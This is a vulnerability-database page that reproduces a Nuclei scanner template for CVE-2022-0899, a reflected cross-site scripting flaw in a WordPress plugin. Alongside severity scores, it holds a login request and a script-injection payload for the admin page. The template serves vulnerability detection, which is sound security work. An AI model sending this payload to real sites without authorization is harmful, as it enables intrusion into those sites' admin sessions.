Lucene search
ProjectDiscoveryNUCLEI:CVE-2022-0899HistoryOct 17, 2023 - 7:20 a.m.
Header Footer Code Manager < 1.1.24 - Cross-Site Scripting
2023-10-1707:20:28
ProjectDiscovery
github.com
4
cve2022
wpscan
wordpress
plugin
cross-site scripting
authenticated
draftpress
attribute
admin page
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.001 Low
EPSS
Percentile
43.5%
The Header Footer Code Manager WordPress plugin before 1.1.24 does not escape generated URLs before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting.
id: CVE-2022-0899
info:
name: Header Footer Code Manager < 1.1.24 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The Header Footer Code Manager WordPress plugin before 1.1.24 does not escape generated URLs before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting.
reference:
- https://wpscan.com/vulnerability/1772417a-1abb-4d97-9694-1254840defd1
- https://nvd.nist.gov/vuln/detail/CVE-2022-0899
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0899
cwe-id: CWE-79
epss-score: 0.00106
epss-percentile: 0.42122
cpe: cpe:2.3:a:draftpress:header_footer_code_manager:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: draftpress
product: header_footer_code_manager
framework: wordpress
google-query: inurl:"/wp-content/plugins/wp-custom-pages/"
tags: cve2022,cve,wpscan,wp,wp-plugin,wordpress,xss,authenticated,draftpress
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=hfcm-list&'><script>alert(/document.domain/)</script> HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<script>alert(/document.domain/)</script>")'
- 'contains(body_2, "All Snippets")'
condition: and
# digest: 4a0a00473045022100b32980c7114cd709456c3dc2981fea5cc461cdceea2fa72435ff2eaef203ffec0220073fa37edb8092f60568dcfaf1f76c0222a33a59781499c8ecea5fcbb9e667b6:922c64590222798bb761d5b6d8e72950Related
cvelist
cvelist
nvd
nvd
CVE-2022-0899
2022-07-25 13:15:08
wpvulndb
wpvulndb
Header Footer Code Manager < 1.1.24 - Reflected Cross-Site Scripting
2022-07-04 00:00:00
openvas
openvas
WordPress Header Footer Code Manager Plugin < 1.1.24 XSS Vulnerability
2022-07-26 00:00:00
cve
cve
CVE-2022-0899
2022-07-25 13:15:08
patchstack
patchstack
prion
prion
Cross site scripting
2022-07-25 13:15:00
wpexploit
wpexploit
Header Footer Code Manager < 1.1.24 - Reflected Cross-Site Scripting
2022-07-04 00:00:00
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.001 Low
EPSS
Percentile
43.5%
Related for NUCLEI:CVE-2022-0899